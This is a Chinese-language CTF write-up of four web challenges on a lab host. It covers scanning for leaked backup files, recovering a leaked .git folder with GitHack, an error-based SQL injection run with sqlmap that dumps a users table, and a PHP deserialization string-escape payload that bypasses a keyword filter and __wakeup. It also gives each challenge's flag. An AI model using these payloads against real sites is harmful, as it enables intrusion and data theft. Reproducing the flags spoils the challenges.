by:gyy

WEB-常见的搜集

信息收集

题目链接:http://10.147.19.176:7001/
敏感文件 Hello, CTFer! 信息搜集之所以重要,是因为其往往会带给我们一些意想不到的东西

hack fun

yysy,确实

信息收集
Part1
遇事不决,先扫为敬 真·找到了 
/.index.php.swp
知识链接:.swp文件是备份文件,平时vim强退一定要注意.swp文件的删除!

进去访问下载

发现flag3,说明flag分为好多部分

Part2
扫描还扫到了 
/index.php~
直接访问得 flag2:c192M3J5X2lt
Part3
将扫描进行到底 还扫到了 
/robots.txt
进去康康 
User-agent: *
Disallow:
/flag1_is_her3_fun.txt
访问得 flag1:aW5mb18x

最终

组合得flag
小结
扫就完事了

WEB-粗心的小李

Git泄露

题目链接:http://10.147.19.176:7002/
Git测试 Hello, CTFer! 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

小李好像不是很小心,经过了几次迭代更新就直接就把整个文件夹放到线上环境了:(

very easy

Git

访问./.git发现跳转到了./.git/ 根据题目是git泄露
神器Git Hack
命令: 
$ python2 GitHack.py -u "http://10.147.19.176:7002/.git"
扒下来.git文件
分析
命令看一下 
$ git log --reflog
commit 213b7e386e9b0b406d91fae58bf8be11a58c3f88 (HEAD -> master)
Author: Veneno <593220746@qq.com>
Date:   Wed Dec 4 11:04:14 2019 +0800


flag

发现有flag
恢复一下(注意,这里要往上一个目录)

$ git reset --hard 213b7e386e9b0b406d91fae58bf8be11a58c3f88
HEAD is now at 213b7e3 flag

恢复了index.html

最终

index.html里找到flag

问题解决:n1book{Z2l0X2xvb2tzX3MwX2Vhc3lmdW4}

小结
Git hack好用,还有个git extrack

WEB-SQL注入-1

SQL注入

题目链接:http://10.147.19.176:7004/login.php

SQLmap真香

sql注入不说了
sqlmap直接跑 由于是POST测试,抓个包下来存文件,在name处改个* 跑sqlmap 
$ python2 sqlmap.py -r 1.txt
出结果 
sqlmap identified the following injection point(s) with a total of 1488 HTTP(s) requests:

Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=' AND (SELECT 7087 FROM(SELECT COUNT(),CONCAT(0x71786b7171,(SELECT (ELT(7087=7087,1))),0x717a627671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Uilw&pass=1
 [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
ok,直接全扒下来--dump 
Database: note
Table: users
[2 entries]
+----+----------------------------------+----------+
| id | passwd                           | username |
+----+----------------------------------+----------+
| 1  | 26f1c86def93bd19fb3ba6ad3d9f2a87 | test     |
| 2  | 26f1c86def93bd19fb3ba6ad3d9f2a87 | admin    |
+----+----------------------------------+----------+

最终

Payload =sqlmap.py -r 1.txt -D note -T fl4g --dump
问题解决:n1book{bG9naW5fc3FsaV9pc19uaWNl}
小结
善用Sqlmap,能跑出来的不多了...

Unserialize++

反序列化字符串逃逸

guest.php 先上payload打到admin,字符串逃逸成功

payload = your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}

index.php中

file_put_contents("caches/".hash("sha256", \$\_SERVER['REMOTE_ADDR']), put(serialize($guest)));

function put($data){
$data = str_replace(chr(0)."*".chr(0), 'uuuuuu', $data);
return $data;
}
每6个u换三个字符,使得name盖过pass的字符并"闭合,然后反序列化就会读取我们准备的字符,即从 
'your[pass.able=AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}'
的分号开始

本地./caches/下的内容

O:7:"someone":3:{s:12:"uuuuuuyour_name";s:60:"uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu";s:12:"uuuuuuyour_pass";s:53:"AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}";s:8:"uuuuuuadmin";i:0;}

即后get

function get($data){
$data = str_replace('uuuuuu', chr(0)."*".chr(0), $data);
return $data;
}

会读取

"O:7:\"someone\":3:{s:12:\"\\u0000*\\u0000your_name\";s:60:\"\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\";s:12:\"\\u0000*\\u0000your_pass\";s:53:\"AA\";s:12:\"\\u0000*\\u0000your_pass\";s:2:\"AA\";s:5:\"admin\";i:1;}\";s:8:\"\\u0000*\\u0000admin\";i:0;}"

忽略不可见字符后
读取到其中

 [your_name:protected] => **********";s:12:"*your_pass";s:53:"AA
 [your_pass:protected] => AA 
 [admin:protected] => 1

然而本题和admin没有任何关系

构造

O:6:"level1":1:{s:8:"username";O:6:"level2":1:{s:8:"username";O:6:"level3":1:{s:8:"username";s:5:"admin";}}}
payload = your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=A";s:12:"uuuuuuyour_pass";O:6:"level1":1:{s:8:"username";O:6:"level2":1:{s:8:"username";O:6:"level3":1:{s:8:"username";s:5:"admin";}}}
check不允许匹配到"username"字符串

于是准备绕过
类型的字符S使用大写
u=\75

level2中有__wakeup()方法,于是绕过 
O:6:"level2":2
例如本题, 
O:7:"someone":3:{s:12:"uuuuuuyour_name";s:60:"uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu";s:12:"uuuuuuyour_pass";s:53:"AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}";s:8:"uuuuuuadmin";i:0;}
我们有u x60,最后换成字符30个,于是反序列化会继续向下读取 
s:60:"**********";s:12:"*your_pass";s:53:"AA    |(到此为止)
然后"正常闭合,这样接下来就会读取我们构造的字符串,字符串成功逃逸 
";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}|(到此为止)
下面无用了,因为}正常闭合,反序列化结束 
";s:8:"uuuuuuadmin";i:0;}
以上是admin的方法,取flag原理方法同上

最终

payload =your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=A";s:12:"uuuuuuyour_pass";O:6:"level1":1:{S:8:"\75sername";O:6:"level2":2:{S:8:"\75sername";O:6:"level3":1:{S:8:"\75sername";s:5:"admin";}}}

再访问./guest.php解决

问题解决:s3c{NEJHdTBFaWJtekd5QFptRXZiTERTVW5rRTE4UDZrRio}

小结:
字符串逃逸字符个数一定要算好!(吐血